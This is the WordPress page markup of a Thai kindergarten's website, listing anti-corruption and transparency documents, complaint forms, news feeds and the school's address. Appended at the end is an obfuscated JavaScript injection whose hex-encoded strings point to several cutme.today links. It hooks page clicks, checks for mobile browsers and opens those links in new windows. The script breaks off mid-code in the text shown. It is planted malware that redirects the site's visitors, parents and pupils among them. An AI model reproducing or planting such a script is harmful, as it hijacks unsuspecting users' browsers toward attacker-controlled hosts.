class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 